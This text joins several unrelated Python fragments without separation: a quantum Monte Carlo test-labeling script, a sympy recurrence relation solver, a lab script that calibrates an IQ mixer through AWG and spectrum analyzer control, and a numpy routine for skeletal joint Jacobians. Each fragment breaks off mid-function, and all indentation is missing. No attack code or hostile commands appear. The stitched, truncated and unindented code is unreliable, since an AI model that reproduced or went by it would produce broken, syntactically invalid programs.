'short-NiO_a4_e48_pp-dmc-TMv1v3_sdj',
'long-heg_14_gamma-sj-1-16',
'short-chn_ae_cuspCorrection-vmc',
'short-li2_sto-sj_dmc',
'short-LiH_dimer_ae_qp-vmc_hf_noj',
'short-LiH_dimer_ae_pyscf-vmc_hf_noj',
'short-LiH_ae-vmc_msdj-1-16',
'short-LiH_ae-vmc_msdj_noj-1-16',
'vmc_short_C2_pp_msdj-H5',
])
poor_test |= set([
'short-bccH_2x2x2_ae-deriv',
'short-bccH_2x2x2_ae-gamma-deriv',
'short-bccH_2x2x2_ae-grad_lap',
'short-bccH_3x3x3_ae-deriv',
'short-bccH_3x3x3_ae-gamma-deriv',
'short-bccH_3x3x3_ae-grad_lap',
'short-bccH_3x3x3_ae-not_orth-deriv',
])
# aos specific (but general otherwise)
if aos:
intermittent_stat_fail |= set([
'short-H4-orb-opt-dmc',
])
check_fail |= set([
'short-bccH_2x2x2_ae-deriv',
'short-bccH_2x2x2_ae-gamma-deriv',
'short-bccH_2x2x2_ae-grad_lap',
'short-bccH_3x3x3_ae-deriv',
'short-bccH_3x3x3_ae-gamma-deriv',
'short-bccH_3x3x3_ae-grad_lap',
'short-bccH_3x3x3_ae-not_orth-deriv',
])
#end if
# soa specific (but general otherwise)
if soa:
hard_fail |= set([
'long-heg_14_gamma-sjb',
'short-heg_14_gamma-sjb',
])
abort |= set([
'long-c_no-hf_vmc',
'long-c_no-sj_dmc',
'short-bccH_2x2x2_ae-deriv',
'short-bccH_3x3x3_ae-deriv',
'short-bccH_3x3x3_ae-grad_lap',
'short-c_no-hf_vmc',
'short-c_no-sj_dmc',
'short-H2-FDLR',
'short-H2-orb-opt',
'short-H4-FDLR',
'short-H4-orb-opt',
'short-H4-orb-opt-dmc',
'short-bccH_2x2x2_ae-gamma-deriv',
'short-bccH_2x2x2_ae-grad_lap',
'short-bccH_3x3x3_ae-gamma-deriv',
'short-bccH_3x3x3_ae-not_orth-deriv',
])
check_fail |= set([
'short-bccH_2x2x2_ae-deriv',
'short-bccH_3x3x3_ae-deriv',
'short-bccH_3x3x3_ae-grad_lap',
])
intermittent_stat_fail |= set([
'short-H4-opt-cslinear-rescale',
])
#end if
# gpu specific (but general otherwise)
if gpu:
check_fail |= set([
'restart-1-16',
'short-diamondC_1x1x1_pp-dmc-estimator-density',
'short-diamondC_1x1x1_pp-dmc-estimator-spindensity',
])
poor_test |= set([
'restart-1-16',
])
unsupported |= set([
'estimator-skinetic',
'short-afqmc-N2_vdz',
'short-diamondC-afqmc',
'short-diamondC-afqmc_hyb',
'short-diamondC-afqmc_hyb_nn2',
'short-diamondC-afqmc_incmf',
'short-diamondC-afqmc_incmf_nn2',
'short-diamondC-afqmc_nn2',
'short-diamondC_1x1x1_hybridrep_pp-vmc_sdj',
'short-diamondC_1x1x1_pp-vmc_sdj_kspace',
'short-diamondC_2x1x1_hybridrep_pp-vmc_sdj',
'short-LiH_solid_1x1x1_hybridrep_pp-x-vmc_hf_noj',
'short-monoO_1x1x1_pp-vmc_sdj3',
'short-NiO_a4_e48-batched_pp-vmc_sdj3',
'short-NiO_a4_e48-hybridrep-batched_pp-vmc_sdj3',
'short-NiO_a4_e48-hybridrep-pp-vmc_sdj3',
'short-NiO_a4_e48_pp-vmc_sdj3',
])
#end if
# real specific (but general otherwise)
if real:
None
#end if
# complex specific (but general otherwise)
if comp:
None
#end if
# mixed precision specific (but general otherwise)
if mixed:
abort |= set([
'short-diamondC_1x1x1_pp-vmc-estimator-energydensity-cell',
'short-diamondC_1x1x1_pp-vmc-estimator-energydensity-voronoi',
'short-LiH_dimer_ae-vmc_hf_noj_estimator_energydensity_voronoi',
'short-LiH_dimer_pp-vmc_hf_sdj_estimator_spindensity',
])
#end if
# finer details based on build
# AoS issues
if aos and cpu and real and full:
abort |= set([
'long-NiO_afm-afqmc',
'short-c_no-hf_vmc-4-4',
])
definite_stat_fail |= set([
'long-monoO_1x1x1_pp-vmc_sdj3', # flux fails
'short-H4-opt-cslinear-rescale', # energy fails
'short-LiH_dimer_ae_qp-vmc_hf_noj', # energy fails
])
elif aos and cpu and real and mixed:
definite_stat_fail |= set([
'short-c_no-sj_dmc', # variance fails
])
elif aos and cpu and comp and full:
None
elif aos and cpu and comp and mixed:
None
elif aos and gpu and real and full:
None
elif aos and gpu and real and mixed:
None
elif aos and gpu and comp and full:
None
elif aos and gpu and comp and mixed:
None
#end if
# SoA issues
if soa and comp and cpu:
abort |= set([
'short-diamondC_1x1x1_pp-vmc_gaussian_sdj',
'short-diamondC_2x1x1_pp-vmc_gaussian_sdj',
'long-diamondC_2x1x1_pp-dmc_gaussian_sdj',
])
#end if
if soa and cpu and real and full:
abort |= set([
'long-NiO_afm-afqmc',
])
check_fail |= set([
'short-diamondC_2x1x1_pp-vmc_gaussian_sdj', # ionion fails
])
definite_stat_fail |= set([
'long-C2_pp-msdj_vmc',
'long-diamondC_1x1x1_pp-vmc-dmc-allp_sdj',
])
elif soa and cpu and real and mixed:
check_fail |= set([
'short-diamondC_2x1x1_pp-vmc_gaussian_sdj', # ionion fails
])
elif soa and cpu and comp and full:
None
elif soa and cpu and comp and mixed:
None
elif soa and gpu and real and full:
None
elif soa and gpu and real and mixed:
None
elif soa and gpu and comp and full:
None
elif soa and gpu and comp and mixed:
None
#end if
# derive all other sets from the primary sets
# don't require failure type to be enumerated for unsupported
# just assume abort is used for now
abort |= unsupported - abort - hard_fail
# weak failures: insufficient to tell if there is a bug
weak_fail = intermittent_stat_fail \
| deterministic_fail
# strong failures: sufficient to tell if there is a bug
strong_fail = hard_fail \
| abort \
| check_fail \
| reference_stat_fail \
| definite_stat_fail
fail = weak_fail | strong_fail
# a test is unstable if it fails for any reason
unstable = fail | poor_test | unsupported
# a failure is a bug if it is a strong failure (strong fail => bug)
# intermittent failures imply bugs only with verified good test data
# unsupported features are not bugs
bug = (strong_fail | (good_test & intermittent_stat_fail)) - unsupported
# a failing test needs to be followed up with a reference-level statistical test
# if it is insufficient on its own to imply a bug
# currently this includes intermittent failures with test data of unverified quality
# and deterministic failures
cause_unknown = unstable - bug - unsupported - poor_test
positive_label_sets = dict(
# main classification
unstable = unstable,
# reason for failure
bug = bug,
unsupported = unsupported,
poor_test = poor_test,
cause_unknown = cause_unknown,
# failure type classification
hard_fail = hard_fail,
abort = abort,
check_fail = check_fail,
reference_stat_fail = reference_stat_fail,
definite_stat_fail = definite_stat_fail,
intermittent_stat_fail = intermittent_stat_fail,
deterministic_fail = deterministic_fail,
# test quality categories (also poor_test)
good_test = good_test,
)
negative_label_sets = dict(
# main classification
#stable = unstable, # can't add this because ctest regex matches "unstable"
# test quality categories
quality_unknown = good_test | poor_test,
)
return positive_label_sets,negative_label_sets
#end def create_label_sets
def check_exclusive(*labels):
# fast check of mutual exclusivity
exclusive = True
lsets = [positive_label_sets[l] for l in labels]
combined = set(lsets[0])
for lset in lsets[1:]:
exclusive &= len(lset & combined)==0
if not exclusive:
break
#end if
combined |= lset
#end for
# slower process to report errors
if not exclusive:
for i in range(len(labels)):
for j in range(i):
overlap = lsets[i] & lsets[j]
if(len(overlap)>0):
error('label sets {0} and {1} are not mutually exclusive\n overlap: {2}'.format(labels[i],labels[j],sorted(overlap)))
#end if
#end for
#end for
#end if
#end def check_exclusive
def check_comprehensive(full_label,*other_labels):
full = set(positive_label_sets[full_label])
for label in other_labels:
full -= positive_label_sets[label]
#end for
if len(full)>0:
error('the following sets are not comprehensive:\n {0}\nthese should equate to set: {1}\nbut the following tests are not labeled: {2}'.format(other_labels,full_label,sorted(full)))
#end if
#end def check_comprehensive
def check_positive_label_sets(positive_label_sets):
check_exclusive('good_test','poor_test')
check_comprehensive('unstable',
'bug',
'unsupported',
'poor_test',
'cause_unknown'
)
check_comprehensive('unstable',
| |
<reponame>rowanG077/RecurrenceRelationSolver<gh_stars>1-10
#!/usr/bin/env python3
# coding=utf-8
import logging
import re
import sympy
from sympy.solvers.solveset import linsolve
class RecurrenceSolveFailed(Exception):
"""
RecurrenceSolveFailed will be thrown when recurrence relation couldn't be solved fails
"""
def __init__(self, reason):
"""
create RecurrenceSolveFailed object
Args:
reason (string): Why the solve couldn't be performed
"""
self.reason = reason
class RecurrenceRelation(object):
"""
RecurrenceRelation object that contains a recurrence relations
and initial conitions. Allows for solving and verifications
"""
def __init__(self, recurrence, initialConditions):
"""
create RecurrenceRelation object
Args:
recurrence (string): The recurrence as a string
initialConditions (dict of string: string): The initial conditions
"""
# contains the context for running sympy functions
# on the recurrence relation
self._sympy_context = {
"s": sympy.Function("s"),
"n": sympy.var("n", integer = True)
}
# Translate input string expression to sympy expression
self._recurrence = self._to_sympy(recurrence)
self._initialConditions = { k: self._to_sympy(v) for (k,v) in initialConditions.items() }
# Solved values will be stored here in a bottom up dynamic programming manner
self._solvedValues = dict(self._initialConditions)
# Contains the closed from as calculated by our own algorithm
self._closedForm = None
def _to_sympy(self, expr):
"""
sympy represents powers not with ^ but with **.
Translate from normal representation to sympy representation here
Args:
expr (string): string of an expression in normal format
Returns:
sympy expression: The string parsed into a sympy expression
"""
raw = re.sub(r"\^", "**", expr)
return sympy.sympify(raw, self._sympy_context).expand()
def _from_sympy(self, expr):
"""
sympy represents square roots as sqrt() but we require it to be ^(1/2)
also powers are represented as ** by sympy but we need to have ^.
This function takes a sympy expression and returns the appropiate string.
Args:
expr (sympy expression): string of an expression in sympy format
Returns:
string: The sympy expression stringified
"""
expressionString = re.sub(r"\*\*", "^", str(expr))
i = expressionString.find("sqrt")
while i != -1:
nestCount = 0
endSqrtIndex = -1
for j in range(i, len(expressionString)):
if expressionString[j] == '(':
nestCount += 1
elif expressionString[j] == ')':
if nestCount == 1:
endSqrtIndex = j + 1
break
nestCount -= 1
sqrtExpr = expressionString[i+4:endSqrtIndex].strip()
expressionString = "%s(%s^(1/2))%s" % (expressionString[0:i], sqrtExpr, expressionString[endSqrtIndex:])
i = expressionString.find("sqrt")
return expressionString
def getRecurrence(self):
"""
Get the recurrence
Returns:
string: The recurrence
"""
return self._from_sympy(self._recurrence)
def getLowerBoundDomain(self):
"""
get the low bound where the recurrence is defined
Returns:
int: The start where the recurrence is defined
"""
return min([int(k) for k,v in self._initialConditions.items()])
def _set_free_variables_to_zero(self, solution):
"""
Given a sympy solution with multiple solution fill out any free variables as 0.
Args:
solution (dict of sympy symbol: sympy expression): The solution for each symbol
where free variables have been
eliminated
"""
# some symbols might not be in the solutions itself so add them here
newSolution = { a:solution[a] if a in solution else a for sym, sol in solution.items() for a in sol.atoms(sympy.Symbol) }
newSolution.update(solution)
# Find all free variables and create a dict so we can easily replace them
replaceDict = { sym:0 for sym, sol in newSolution.items() if sym == sol }
return { symbol: expr.subs(replaceDict) for symbol, expr in newSolution.items() }
def _getGeneralSolution(self, realRoots):
"""
get the general solution given the roots of the characteristic equation.
Args:
realRoots (dict of sympy expr: int): The roots of the characteristic equation with multiplicities
Returns:
sympy expression: The general solution
"""
ctx = {
"n": self._sympy_context["n"]
}
# Generate general solution
generalSolutionTerms = []
for i, (s,m) in enumerate(realRoots.items()):
terms = []
for j in range(0, m):
varname = "p_%d_%d" % (i,j)
ctx[varname] = sympy.var(varname)
terms.append("%s * n**%d" % (varname, j))
generalSolutionTerms.append("(%s)*(%s)**n" % (" + ".join(terms), str(s)))
return sympy.sympify(' + '.join(generalSolutionTerms), ctx), ctx
def _calculateClosedFromGeneralSolution(self, generalSolution, ctx):
"""
get the closed form equation for a general solution.
Args:
generalSolution (sympy expression): The general solution
ctx (dict of string: sympy symbol): The context of the general solution
Returns:
sympy expression: The closed form solved
"""
# Create system of equations using initial conditions
equations = []
for i,c in self._initialConditions.items():
eq = generalSolution - sympy.sympify("(%s)" % str(c))
equations.append(eq.subs(ctx["n"], i))
logging.info("Solving the system of linear equations:")
for e in equations:
logging.info("\t%s" % str(e))
# Solve the system of equation
solve_symbols = [ e for n, e in ctx.items() if n != "n" ]
solutions = linsolve(equations, solve_symbols)
if len(solutions) == 0:
raise RecurrenceSolveFailed("No solution to the system of equations to find the alfas could be found.")
logging.info("Raw solutions with possibly free variables: %s" % str(solutions))
# linsolve returns a set so we translate it to a dict for the _set_free_variables_to_zero function
solution = { symbol:sol for symbol, sol in zip(solve_symbols, list(list(solutions)[0])) }
logging.info("Dict solution with possibly free variables: %s" % str(solution))
solution = self._set_free_variables_to_zero(solution)
logging.info("Dict solution no free variables: %s" % str(solution))
# fill in the solution of the system
solved = generalSolution.subs(solution)
return solved
def _theorem6Classifier(self, expr, ctx, buckets):
"""
Classify a single term in the non homogenous part of a recurrence relation.
Classification means that that the term will be decomposed into the constant
part, a part with a constant to the power of n and n to the power of a constant.
Args:
expr (sympy expression): The term to classify
ctx (dict of string: sympy symbol): The context of the solution
buckets (dict of sympy expression: dict of sympy expression: sympy symbol): Contains the classified terms
in the form (the constant to the power n):
(n to the power of a constant): (constant)
"""
args = expr.args
if expr.func != sympy.Mul:
args = [expr]
power = sympy.sympify("1", ctx)
constant = sympy.sympify("1", ctx)
poly = sympy.sympify("0", ctx)
for a in args:
if ctx["n"] not in a.atoms():
constant = a
elif a.func == sympy.Symbol:
poly = sympy.sympify("1", ctx)
elif a.func == sympy.Pow and a.args[0].func == sympy.Symbol:
poly = a.args[1]
elif a.func == sympy.Pow and a.args[1].func == sympy.Symbol:
power = a.args[0]
if power not in buckets:
buckets[power] = {}
buckets[power][poly] = constant
def _theorem6SolutionBuilder(self, realroots, nonHomogenous, ctx):
"""
Given the roots of the associated homogenous recurrence relation and the non homogenous part F(n)
of the equation build a particular solution of the correct form.
Args:
realRoots (dict of sympy expr: int): The roots of the characteristic equation with multiplicities
nonHomogenous (sympy expression): The part of the equation that makes the recurrence non homogenous
ctx (dict of string: sympy symbol): The context of the solution to build
Returns:
sympy expression: The form of the particular solution
"""
nonHomogenous = nonHomogenous.expand()
buckets = {}
if nonHomogenous.func != sympy.Add:
self._theorem6Classifier(nonHomogenous, ctx, buckets)
else:
for arg in nonHomogenous.args:
self._theorem6Classifier(arg, ctx, buckets)
particularSolutionTerms = []
for i, (power, polys) in enumerate(buckets.items()):
multiplicity = realroots.get(power, 0)
highestPoly = max(k for k, v in polys.items())
terms = []
for j in range(highestPoly, -1, -1):
varname = "q_%d_%d" % (i,j)
ctx[varname] = sympy.var(varname)
terms.append("%s * n**%d" % (varname, j))
particularSolutionTerms.append("n**%s*(%s)*(%s)**n" % (str(multiplicity), " + ".join(terms), str(power)))
solutionOfCorrectForm = " + ".join(particularSolutionTerms)
logging.info("Buckets from theorem6 classifier: %s" % str(buckets))
logging.info("Solution must exist of form: %s" % solutionOfCorrectForm)
return sympy.sympify(solutionOfCorrectForm, ctx)
def _particularSolutionClassifier(self, expr, ctx, buckets):
"""
Classify a single term of the recurrence relation where the particular solution has been substituted into
Classification means that that the term will be decomposed into buckets of x^n that contains a list of each
term with the degree of that x^n.
Args:
expr (sympy expression): The term to classify
ctx (dict of string: sympy symbol): The context of the solution
buckets (dict of sympy expression: dict of sympy expression: sympy symbol): Contains the classified terms
"""
args = expr.args
if expr.func != sympy.Mul:
args = [expr]
matcherCtx = { "n": ctx["n"], "i": sympy.Wild("i") }
matcher = sympy.sympify("n - i", matcherCtx)
base = sympy.sympify("1", ctx)
degree = sympy.sympify("0", ctx)
term = expr
for a in args:
if a.func == sympy.Pow and len(a.args[0].atoms(sympy.Symbol)) == 0 and len(a.args[1].atoms(sympy.Symbol)) > 0:
base = a.args[0]
m = a.args[1].match(matcher)
degree = m[matcherCtx["i"]]
| |
"""
Created on Wed Jan 15 11:17:10 2020
@author: mesch
"""
from colorama import init, Fore, Back
init(autoreset=True) #to convert termcolor to wins color
import copy
from pyqum.instrument.benchtop import RSA5
from pyqum.instrument.benchtop import PSGA
from pyqum.instrument.modular import AWG
from pyqum.instrument.logger import status_code
from pyqum.instrument.analyzer import curve
from numpy import sin, cos, pi, array, lcm, float64, sum, dot
# print('lcm of 12 ad 10 is %s' %lcm(12,10))
# Initialize instruments:
# PSGA
saga = PSGA.Initiate()
PSGA.rfoutput(saga, action=['Set', 1])
PSGA.frequency(saga, action=['Set', "5.5" + "GHz"])
PSGA.power(saga, action=['Set', "12" + "dBm"])
# Rigol SA
rsa = RSA5.Initiate()
RSA5.frequency(rsa, action=['Set','5.525GHz'])
RSA5.fspan(rsa, action=['Set','150MHz'])
RSA5.rbw(rsa, action=['Set','1MHz'])
RSA5.vbw(rsa, action=['Set','100kHz'])
# AWG
awgsess = AWG.InitWithOptions()
AWG.Abort_Gen(awgsess)
AWG.ref_clock_source(awgsess, action=['Set',int(1)]) # External 10MHz clock-reference
AWG.predistortion_enabled(awgsess, action=['Set',True])
AWG.output_mode_adv(awgsess, action=['Set',int(2)]) # Sequence output mode
AWG.arb_sample_rate(awgsess, action=['Set',float(1250000000)]) # maximum sampling rate
AWG.active_marker(awgsess, action=['Set','1']) # master
AWG.marker_delay(awgsess, action=['Set',float(0)])
AWG.marker_pulse_width(awgsess, action=['Set',float(1e-7)])
AWG.marker_source(awgsess, action=['Set',int(7)])
samplingrate = AWG.arb_sample_rate(awgsess)[1]
dt = 1e9/samplingrate # in ns
# PRESET Output:
for ch in range(2):
channel = str(ch + 1)
AWG.output_config(awgsess, RepCap=channel, action=["Set", 0]) # Single-ended
AWG.output_filter_bandwidth(awgsess, RepCap=channel, action=["Set", 0])
AWG.arb_gain(awgsess, RepCap=channel, action=["Set", 0.5])
AWG.output_impedance(awgsess, RepCap=channel, action=["Set", 50])
# output settings:
for ch in range(2):
channel = str(ch + 1)
AWG.output_enabled(awgsess, RepCap=channel, action=["Set", int(1)]) # ON
AWG.output_filter_enabled(awgsess, RepCap=channel, action=["Set", True])
AWG.output_config(awgsess, RepCap=channel, action=["Set", int(2)]) # Amplified 1:2
AWG.output_filter_bandwidth(awgsess, RepCap=channel, action=["Set", 0])
AWG.arb_gain(awgsess, RepCap=channel, action=["Set", 0.5])
AWG.output_impedance(awgsess, RepCap=channel, action=["Set", 50])
def AWG_Sinewave(ifreq,IQparams):
'''
ifreq: IF frequency in MHz
'''
AWG.Clear_ArbMemory(awgsess)
WAVE = []
# print("ampratio: %s" %type(ampratio))
Ioffset, Qoffset, ampratio, Iphase, Qphase = IQparams
if (ampratio > -1.0) and (ampratio < 1.0):
Iamp = 1
Qamp = Iamp * ampratio
else:
Qamp = 1
Iamp = Qamp/ampratio
ifvoltag = [min(abs(Qamp),1), min(abs(Iamp),1)] # contain amplitude within 1V
iffunction = ['sin', 'cos']
iffreq = [ifreq, ifreq]
ifoffset = [Qoffset, Ioffset]
# Iphase = 0
# relphase = min(abs(relphase), 90)
# Qphase = Iphase + relphase
ifphase = [Qphase, Iphase]
# construct waveform:
for ch in range(2):
channel = str(ch + 1)
Nperiod = lcm(round(1000/iffreq[ch]/dt*100),800)//100
Nperiod *= 8
# print("Waveform contains %s points per sequence" %Nperiod)
wavefom = [ifvoltag[ch] * eval(iffunction[ch] + '(x*%s*%s/1000*2*pi + %s/180*pi)' %(dt,iffreq[ch],ifphase[ch])) + ifoffset[ch] for x in range(Nperiod)]
stat, wave = AWG.CreateArbWaveform(awgsess, wavefom)
# print('Waveform channel %s: %s <%s>' %(channel, wave, status_code(stat)))
WAVE.append(wave)
# Building Sequences:
for ch in range(2):
channel = str(ch + 1)
status, seqhandl = AWG.CreateArbSequence(awgsess, [WAVE[ch]], [1]) # loop# canbe >1 if longer sequence is needed in the future!
# print('Sequence channel %s: %s <%s>' %(channel, seqhandl, status_code(status)))
# Channel Assignment:
stat = AWG.arb_sequence_handle(awgsess, RepCap=channel, action=["Set", seqhandl])
# print('Sequence channel %s embeded: %s <%s>' %(channel, stat[1], status_code(stat[0])))
# Trigger Settings:
for ch in range(2):
channel = str(ch + 1)
AWG.operation_mode(awgsess, RepCap=channel, action=["Set", 0])
AWG.trigger_source_adv(awgsess, RepCap=channel, action=["Set", 0])
AWG.Init_Gen(awgsess)
AWG.Send_Pulse(awgsess, 1)
return
class IQ_Cal:
def __init__(self, suppression='LO', IQparams=array([0.018,-0.022,-1/0.707,-7.1,0.]), STEP=array([-0.5,-0.5,0.5,12,12])):
self.IQparams = IQparams
self.STEP = STEP
self.suppression = suppression
if self.suppression == 'LO':
self.var = copy.copy(self.IQparams[:2])
self.step = self.STEP[:2]
elif self.suppression == 'MR':
self.var = copy.copy(self.IQparams[2:])
self.step = self.STEP[2:]
def nelder_mead(self, no_improve_thr=10e-6, no_improv_break=10, max_iter=0,
alpha=1., gamma=2., rho=-0.5, sigma=0.5, time=0):
'''
Pure Python/Numpy implementation of the Nelder-Mead algorithm.
Reference: https://en.wikipedia.org/wiki/Nelder%E2%80%93Mead_method
'''
'''
@param f (function): function to optimize, must return a scalar score
and operate over a numpy array of the same dimensions as x_start
@param x_start (numpy array): initial position
@param step (float): look-around radius in initial step
@no_improv_thr, no_improv_break (float, int): break after no_improv_break iterations with
an improvement lower than no_improv_thr
@max_iter (int): always break after this number of iterations.
Set it to 0 to loop indefinitely.
@alpha, gamma, rho, sigma (floats): parameters of the algorithm
(see Wikipedia page for reference)
return: tuple (best parameter array, best score)
'''
# def params(IQparams, index):
# if index == 0:
# params = IQparams[:2] # IQ offsets
# else:
# params = IQparams[2:] # IQ imbalance, phase skew
# return params
index = time%2
dim = len(self.var)
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
prev_best = power
no_improv = 0
res = [[self.var, prev_best]]
# while True:
# print("LOPower: %s" %power)
# if bool(input('hello')): break
for i in range(dim):
x = copy.copy(self.var)
x[i] = x[i] + self.step[i]
print('applying %s' %x)
"tell AWG to apply DC offset(x) on I & Q"
# params(IQparams, index) = x
if self.suppression == 'LO': self.IQparams[:2] = x
elif self.suppression == 'MR': self.IQparams[2:] = x
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
score = power
res.append([x, score])
# simplex iter
iters = 0
while 1:
# order
res.sort(key=lambda x: x[1])
if self.suppression == 'LO': self.IQparams[:2] = res[0][0]
elif self.suppression == 'MR': self.IQparams[2:] = res[0][0]
print(Fore.YELLOW + "\rProgress time#%s: %s" %(time, self.IQparams), end='\r', flush=True)
best = res[0][1]
# break after max_iter
if max_iter and iters >= max_iter:
return res[0]
iters += 1
# break after no_improv_break iterations with no improvement
# print('...best so far:', best)
# AWG_Sinewave(25, self.IQparams)
# if float((RSA5.fpower(rsa, str(5.5)+'GHz')).split('dBm')[0]) < -65. and float((RSA5.fpower(rsa, str(5.475)+'GHz')).split('dBm')[0]) < -65.:
# return array([self.IQparams, best, 0.])
if best < prev_best - no_improve_thr or best == prev_best:
no_improv = 0
prev_best = best
else:
no_improv += 1
if no_improv >= no_improv_break:
AWG_Sinewave(25, self.IQparams)
print("Rest at Optimized IQ Settings: %s" %self.IQparams)
return array([self.IQparams, best]) # Optimized parameters
# centroid
x0 = [0.] * dim
for tup in res[:-1]:
for i, c in enumerate(tup[0]):
x0[i] += c / (len(res)-1)
# reflection
xr = x0 + alpha*(x0 - res[-1][0])
if self.suppression == 'LO': self.IQparams[:2] = xr
elif self.suppression == 'MR': self.IQparams[2:] = xr
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
rscore = power
if res[0][1] <= rscore < res[-2][1]:
del res[-1]
res.append([xr, rscore])
continue
# expansion
if rscore < res[0][1]:
xe = x0 + gamma*(x0 - res[-1][0])
if self.suppression == 'LO': self.IQparams[:2] = xe
elif self.suppression == 'MR': self.IQparams[2:] = xe
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
escore = power
if escore < rscore:
del res[-1]
res.append([xe, escore])
continue
else:
del res[-1]
res.append([xr, rscore])
continue
# contraction
xc = x0 + rho*(x0 - res[-1][0])
if self.suppression == 'LO': self.IQparams[:2] = xc
elif self.suppression == 'MR': self.IQparams[2:] = xc
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
cscore = power
if cscore < res[-1][1]:
del res[-1]
res.append([xc, cscore])
continue
# reduction
x1 = res[0][0]
nres = []
for tup in res:
redx = x1 + sigma*(tup[0] - x1)
if self.suppression == 'LO': self.IQparams[:2] = redx
elif self.suppression == 'MR': self.IQparams[2:] = redx
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
score = power
nres.append([redx, score])
res = nres
if __name__ == "__main__":
LO_0 = float((RSA5.fpower(rsa, str(5.5)+'GHz')).split('dBm')[0])
Mirror_0 = float((RSA5.fpower(rsa, str(5.475)+'GHz')).split('dBm')[0])
Initial = [0.018, -0.022, -1/0.707, -7.1, 0.]
time = 0
OPT = IQ_Cal()
OPT.IQparams = array(Initial,dtype=float64)
result = OPT.nelder_mead(time = time)
prev = result[0]
no_improv, no_improv_thr, no_improv_break = 0, 1e-5, 10
LO, Mirror, T = [], [], []
while True:
time += 1
if time%2: OPT = IQ_Cal('MR',result[0])
else: OPT = IQ_Cal('LO',result[0])
result = OPT.nelder_mead(time = time)
# if len(result) == 3:
# print("Optimized IQ parameters:\n %s" %result)
# break
LO.append(float((RSA5.fpower(rsa, str(5.5)+'GHz')).split('dBm')[0]) - LO_0)
Mirror.append(float((RSA5.fpower(rsa, str(5.475)+'GHz')).split('dBm')[0]) - Mirror_0)
print(Back.BLUE + Fore.WHITE + "Mirror has been suppressed for %s from %s" %(Mirror[-1],Mirror_0))
T.append(time)
ssq = sum((result[0] - prev)**2)
if ssq > no_improv_thr:
no_improv = 0
prev = result[0]
else:
no_improv += | |
-= joints[:, parents[1:]]
transforms_mat = transform_mat_np(
rot_mats.reshape(-1, 3, 3),
rel_joints.reshape(-1, 3, 1)).reshape(-1, joints.shape[1], 4, 4)
# print(transforms_mat[0][0])
# print(transforms_mat[0][1])
b = joints.shape[0]
n_j = joints.shape[1]
t_1 = time.time()
# transform_jac = np.zeros((b, n_j, 3, 4, 4))
# transform_jac[:, 0, :, 0:3, 0:3] = rot_mats_jac[:, 0]
transform_jac_chain = np.zeros((b, n_j, 3, parents.shape[0], 4, 4))
for i in range(0, parents.shape[0]):
transform_jac_chain[:, i, :, i, 0:3, 0:3] = rot_mats_jac[:, i]
transform_chain = np.copy(transforms_mat)
for i in range(1, parents.shape[0]):
t_curr = np.matmul(transform_chain[:, parents[i], 0:3, 0:3],
transforms_mat[:, i, 0:3, 3].reshape(-1, 1, 3, 1)).reshape(-1, 1, 3)
transform_chain[:, i, 0:3, 3] = t_curr + transform_chain[:, parents[i], 0:3, 3]
t_i = np.tile(transforms_mat[:, i, 0:3, 3].reshape(-1, 1, 1, 3, 1), (1, n_j, 3, 1, 1))
# print(transform_jac_chain[:, :, :, parents[i], 0:3, 0:3].shape)
# print(t_i.shape)
t_jac_curr = np.matmul(transform_jac_chain[:, :, :, parents[i], 0:3, 0:3], t_i)
transform_jac_chain[:, :, :, i, 0:3, 3] = transform_jac_chain[:, :, :, parents[i], 0:3, 3] + \
t_jac_curr.reshape(-1, n_j, 3, 3)
# transforms = np.stack(transform_chain, axis=1)
transforms = transform_chain
# transforms_jac = np.stack(transform_jac_chain, axis=3)
transforms_jac = transform_jac_chain
t_2 = time.time()
# print(transforms[0][1])
# The last column of the transformations contains the posed joints
posed_joints = transforms[:, :, :3, 3]
posed_joints_jac = transforms_jac[:, :, :, :, :3, 3]
# joints_homogen = np.zeros((b, n_j, 4, 1))
# joints_homogen[:, :, 0:3, 0] = joints
joints_rot = np.matmul(transforms[:,:,0:3,0:3], joints.reshape(b, n_j, 3, 1)).reshape((b, n_j, 3))
# jht = np.pad(np.matmul(transforms, joints_homogen), [(0, 0), (0, 0), (0, 0), (3,0)])
# rel_transforms = transforms - jht
rel_transforms = transforms.copy()
rel_transforms[:, :, 0:3, 3] = rel_transforms[:, :, 0:3, 3] - joints_rot
# jhtj = np.matmul(transforms_jac, joints_homogen.reshape((b, 1, 1, n_j, 4, 1)))
# jhtj = np.pad(jhtj, [(0, 0), (0, 0), (0, 0), (0, 0), (0, 0), (3, 0)])
tjhj = np.matmul(transforms_jac[:,:,:,:,0:3,0:3], joints.reshape((b, 1, 1, n_j, 3, 1))).reshape((b, n_j, 3, n_j, 3))
rel_transforms_jac = transforms_jac.copy()
rel_transforms_jac[:, :, :, :, 0:3, 3] = rel_transforms_jac[:, :, :, :, 0:3, 3] - tjhj
# rel_transforms_jac = transforms_jac - jhtj
